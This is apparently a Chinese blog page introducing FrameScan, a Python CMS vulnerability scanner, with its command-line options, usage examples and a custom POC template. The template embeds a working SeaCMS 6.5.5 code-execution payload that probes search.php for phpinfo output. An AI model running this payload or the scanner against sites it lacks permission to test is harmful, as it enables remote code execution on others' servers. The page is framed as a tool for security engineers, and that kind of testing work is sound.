工具简介

GithubL:https://github.com/qianxiao996/FrameScan

FrameScan是一款python3编写的简易的cms漏洞检测框架,支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行编写POC。旨在帮助有安全经验的安全工程师对已知的应用快速发现漏洞。

支持平台

  • Windows

  • Linux

  • MAC(请自测)

工具特点

  • 单URL批量检测

  • 单URL单漏洞检测

  • 单URL指定CMS检测

  • 多URL单漏洞检测

  • 单URL单漏洞检测

  • 单URL指定CMS检测

详细参数如下:

  1.     -u          Url                      URL地址
  2.     -f          Load urls file           文件路径
  3.     -m          Use poc module           使用单个POC
  4.     -c          Specify CMS              指定CMS类型
  5.     -s          Search poc keywords      查找关键词漏洞
  6.     -lc         List CMS POC             列出指定CMS漏洞
  7.     -l          List avalible pocs       列出所有POC
  8.     -r          Reload POC               重新加载POC
  9.     -txt        Save Result(txt)         输出扫描结果(txt
  10.     -html       Save Result(html)        输出扫描结果(html
  11.     -h          Get help                 帮助信息

使用方法

下载项目

安装依赖(不需要!)

  1. 脚本主要依赖于以下模块(无需安装)
  1. import sys,os,re
  2. from color import *
  3. import sqlite3,requests

运行脚本

  1. >python3 FrameScan.py
  2.      _____                         ____
  3.     |  ___| __ __ _ _ __ ___   ___/ ___|  ___ __ _ _ __
  4.     | || '__/ _` | '` _ \ / _ \___ \ / __/ _` | '_ \
  5.     |  _|| | | (_| | | | | | |  __/___) | (_| (_| | | | |
  6.     |_|  |_|  \__,_|_| |_| |_|\___|____/ \___\__,_|_| |_|
  7.     Options:                          Code by qianxiao996
  8.     -----------------------------------------------------
  9.     -u          Url                      URL地址
  10.     -f          Load urls file           文件路径
  11.     -m          Use poc module           使用单个POC
  12.     -c          Specify CMS              指定CMS类型
  13.     -s          Search poc keywords      查找关键词漏洞
  14.     -lc         List CMS POC             列出指定CMS漏洞
  15.     -l          List avalible pocs       列出所有POC
  16.     -r          Reload POC               重新加载POC
  17.     -txt        Save Result(txt)         输出扫描结果(txt)
  18.     -html       Save Result(html)        输出扫描结果(html)
  19.     -h          Get help                 帮助信息
  20.     -----------------------------------------------------
  21.     FrameScan  V1.1              Blog:blog.qianxiao996.cn

单URL批量检测

  1. python3 FrameScan.py -u URL

单URL单漏洞检测(POC_METHOS可以用 -l、-s、-lc进行查询)

  1. python3 FrameScan.py -u URL -m POC_METHOS

单URL指定CMS检测

  1. python3 FrameScan.py -u URL -m POC_METHOS

多URL批量检测

  1. python3 FrameScan.py -文件名

多URL单漏洞检测

  1. python3 FrameScan.py -文件名  -m  POC_METHOS

多URL指定CMS检测

  1. python3 FrameScan.py -文件名  -c  CMS类型

输出到TXT或者HTML文件

  1. python3 FrameScan.py -u URL -txt   文件名
  2. python3 FrameScan.py -u URL -html  文件名

自定义POC模板

代码中采用自定义彩色输出,请尽量规范编写。脚本中为示例代码。

  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. '''
  4. name: 漏洞名称(禁止换行)控制在30字以内
  5. referer: 漏洞地址(禁止换行)未知请填unknown
  6. author: 作者名
  7. description: 漏洞描述
  8. '''
  9. import sys
  10. import requests
  11. import warnings
  12. def run(url):
  13. #此处编辑检测代码
  14. #示例代码,请更改result内容,result[0]为漏洞名称,result[1]为返回的内容,result[2]为测试结果
  15. result = ['seacms v6.5.5代码执行漏洞','','']
  16. headers = {
  17. "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
  18. }
  19. payload = "searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/*"
  20. url_path = url + "/search.php?phpinfo();"
  21. try:
  22. data = requests.get(url_path, timeout=3,headers=headers, verify=False)
  23. if data.status_code == 200 and 'phpinfo' in data.text:
  24. result[2]= "存在"
  25. result[1] = "URL:%s\nPOST:%s"%(url_path,payload)
  26. else:
  27. result[2] = "不存在"
  28. except Exception as e:
  29. # print (e)
  30. result[2] ="不存在"
  31. #这里可设置未知,连接超时等,只有不存在不会显示到结果中。
  32. return result
  33. #最后一定要返回一个带有3个参数的列表。不然会出错误。
  34. if __name__ == "__main__":
  35. #此处不会调用
  36. warnings.filterwarnings("ignore")
  37. testVuln = run("http://baidu.com")
  38. print(testVuln)

鸣谢

POC多数来源于 AngelSword:https://github.com/Sch01ar/AngelSword 部分为自己编写,欢迎投递POC

邮箱地址:qianxiao996@126.com

警告!

请勿用于非法用途!否则自行承担一切后果

FrameScan CMS漏洞扫描的更多相关文章

  1. FrameScan-GUI CMS漏洞扫描

    工具简介 FrameScan-GUI是一款python3和Pyqt编写的具有图形化界面的cms漏洞检测框架,是FrameScan的加强版.支持多种检测方式,支持大多数CMS,可以自定义CMS类型及自行 ...

  2. Web漏洞扫描工具(批量脱壳、反序列化、CMS)

    一.什么是Web漏洞扫描工具 即是指“扫描Web应用以查找安全漏洞(如跨站脚本,SQL注入,命令执行,目录遍历和不安全服务器配置)的自动化工具”,其中许多可能是由不安全或不正确的编码和设计.另一方面, ...

  3. Kali Linux渗透基础知识整理(二)漏洞扫描

    Kali Linux渗透基础知识整理系列文章回顾 漏洞扫描 网络流量 Nmap Hping3 Nessus whatweb DirBuster joomscan WPScan 网络流量 网络流量就是网 ...

  4. RED_HAWK:基于PHP实现的信息收集与SQL注入漏洞扫描工具

    无事早上就去逛freebuf看到一款不错的工具,打算介绍给大家 RED_HAWK:基于PHP实现的信息收集与SQL注入漏洞扫描工具 RED HAWK 最新版本:v1.0.0[2017年6月11日] 下 ...

  5. web漏洞扫描工具集合

    最好用的开源Web漏洞扫描工具梳理 链接:www.freebuf.com/articles/web/155209.html 赛门铁克2017年互联网安全威胁报告中提出在他们今年扫描的网站中,有76%都 ...

  6. 20165223《网络对抗技术》Exp6 信息搜集与漏洞扫描

    目录 -- 信息搜集与漏洞扫描 实践说明 实践目标 基础知识问答 实践内容 各种搜索技巧的应用 Google搜索引擎扫描--Google Hacking msf搜索引擎扫描--搜索网址目录结构 搜索特 ...

  7. (转译)2019年WEB漏洞扫描工具和软件前十名推荐

    这些工具都有助于发现漏洞,从而最大限度地提高测试人员的时间和效率.这些工具,2019年更新,也可用于寻找漏洞. 为何扫描? 这资源是什么? Web应用程序对黑客具有极大的吸引力,并且出于百万种不同的原 ...

  8. SZhe_Scan碎遮:一款基于Flask框架的web漏洞扫描神器

    SZhe_Scan碎遮:一款基于Flask框架的web漏洞扫描神器 天幕如遮,唯我一刀可碎千里华盖,纵横四海而无阻,是谓碎遮 --取自<有匪> 写在前面 这段时间很多时间都在忙着编写该项目 ...

  9. APP漏洞扫描用地址空间随机化

    APP漏洞扫描用地址空间随机化 前言 我们在前文<APP漏洞扫描器之本地拒绝服务检测详解>了解到阿里聚安全漏洞扫描器有一项静态分析加动态模糊测试的方法来检测的功能,并详细的介绍了它在针对本 ...

随机推荐

  1. Keras学习:第一个例子-训练MNIST数据集

    import numpy as npimport gzip import struct import keras as ks import logging from keras.layers impo ...

  2. Solution -「Gym 102956A」Belarusian State University

    \(\mathcal{Description}\)   Link.   给定两个不超过 \(2^n-1\) 次的多项式 \(A,B\),对于第 \(i\in[0,n)\) 个二进制位,定义任意一个二元 ...

  3. Solution -「AGC 012F」「AT 2366」Prefix Median

    \(\mathcal{Description}\)   Link.   给定序列 \(\{a_{2n-1}\}\),将 \(\{a_{2n-1}\}\) 按任意顺序排列后,令序列 \(b_i\) 为前 ...

  4. Nginx兼容框架的pathinfo模式与URL重写

    几乎所有的框架(ThinkPHP,Zend Framework,CI,Yii,laravel等)都会使用URL重写或者pathinfo模式,使URL看起来更美观,比如可以隐藏掉入口文件,并且有利于搜索 ...

  5. JVM基础学习(二):内存分配策略与垃圾收集技术

    Java与C++之间有一堵由内存动态分配和垃圾收集技术所围成的高墙,墙外面的人想进去,墙里面的人却想出来 垃圾收集概述 Java内存模型中的堆和方法区是垃圾收集技术所需要关注的终点,因为其他的区域会跟 ...

  6. 如何使用IDEA工具右边栏的Database模块

    理解Spring Boot自动配置数据源相关代码进行测试时总是无法链接数据库,但是其他方式链接又是没有问题.不知道哪里出现问题了,后来搜资料无意中看到idea提供了Database模块可以测试,就是用 ...

  7. BI系统要自研还是采购?这篇文章告诉你

    首先说一下目前市面上的BI工具都有哪些吧.总体上,其实分为免费和付费两大阵营.免费阵营里,为首的当然是GA(也就是谷歌分析).PowerBI,但是由于有墙的限制,很多公司没法使用前者.付费阵营里,近两 ...

  8. starter

    传统的 Spring 项目想要运行,不仅需要导入各种依赖,还要对各种 XML 配置文件进行配置,十分繁琐,但 Spring Boot 项目在创建完成后,即使不编写任何代码,不进行任何配置也能够直接运行 ...

  9. IntelliJ:下载第三方库

    学习自:(6条消息) IDEA中第三方软件包安装步骤_Li某人_初学者-CSDN博客 1.下载对应的软件包:以commons-logging为例 2.复制这个jar包到项目根目录下的lib目录下(li ...

  10. P1424

    #include <stdio.h> int main(){ int s = 250; int x, n, distance = 0; scanf("%d %d",&a ...